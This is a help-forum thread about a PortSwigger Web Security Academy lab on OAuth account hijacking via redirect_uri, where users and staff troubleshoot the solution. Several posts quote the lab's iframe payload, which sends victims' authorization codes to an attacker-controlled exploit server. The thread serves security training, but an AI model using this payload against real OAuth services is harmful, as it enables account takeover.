Burp Suite User Forum

Create new post

Lab: OAuth account hijacking via redirect_uri

Prachi | Last updated: Jan 16, 2023 05:50PM UTC

<iframe src="https://YOUR-LAB-OAUTH-SERVER-ID.web-security-academy.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe> in this exploit, what is YOUR-LAB-OAUTH-SERVER-ID & YOUR-LAB-CLIENT-ID??

Ben, PortSwigger Agent | Last updated: Jan 16, 2023 06:00PM UTC

Hi Prachi, 'YOUR-LAB-CLIENT-ID' is the URL of your lab instance whereas 'YOUR-LAB-OAUTH-SERVER-ID' is the URL of the OAuth service being used in your lab instance (you should be able to find this by checking your HTTP history and this will start 'https://oauth-').

Prachi | Last updated: Jan 17, 2023 06:53AM UTC

i tried to put my lab instance as client id but i get below error when i load the iframe by clicking on view exploit- oops! something went wrong error: invalid_client error_description: client is invalid

Prachi | Last updated: Jan 17, 2023 07:19AM UTC

Figured it out - YOUR-LAB-OAUTH-SERVER :- starts with 'https://oauth-', found in host header of GET /auth request YOUR-LAB-CLIENT-ID :- GET /auth?client_id=[....] YOUR-LAB-ID :- lab instance ID YOUR-EXPLOIT-SERVER-ID :- exploit server ID

Liam, PortSwigger Agent | Last updated: Jan 17, 2023 06:53PM UTC

Thanks for letting us know, Prachi. Please let us know if you need any further assistance.

Wong | Last updated: May 25, 2023 01:18AM UTC

I got this error SessionNotFound: invalid_request at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11) at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27) at /home/carlos/oauth/index.js:160:34 at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at setNoCache (/home/carlos/oauth/index.js:121:5) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)

Ben, PortSwigger Agent | Last updated: May 25, 2023 08:01AM UTC

Hi, Are you able to provide us with details of what steps you have taken in this lab prior to seeing this error?

Wong | Last updated: May 29, 2023 02:22AM UTC

On step 6: Go back to the exploit server and create the following iframe at /exploit: <iframe src="https://oauth-YOUR-LAB-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Wong | Last updated: May 29, 2023 02:23AM UTC

when i click view exploit, i got this error

Wong | Last updated: May 29, 2023 02:57AM UTC

Why i get the exploit code but all return 500 internal failure?

Ben, PortSwigger Agent | Last updated: May 30, 2023 10:47AM UTC

Hi, What values are you using within the iframe?

Wong | Last updated: Jun 01, 2023 08:04AM UTC

<iframe src="https://oauth-0a1400110305fcc180cd4256020a0083.oauth-server.net/auth?client_id=jhchozeafs9d9ej83rofi&redirect_uri=https://exploit-0a3900b803e5fc9e80a343d001050022.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Ben, PortSwigger Agent | Last updated: Jun 02, 2023 07:20AM UTC

Hi, Assuming that they are the correct values for your lab instance, then I cannot see anything obviously wrong with the exploit that you have created. I have run through this lab a few times in the last few days and have had no issues solving the lab by using the written solution so it appears to be working as expected. Are you able to create a video of the process that you are performing so we can see this in its entirety? It might be easier to share this via email so please feel free to send us an email at support@portswigger.net and we can take a look from there.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.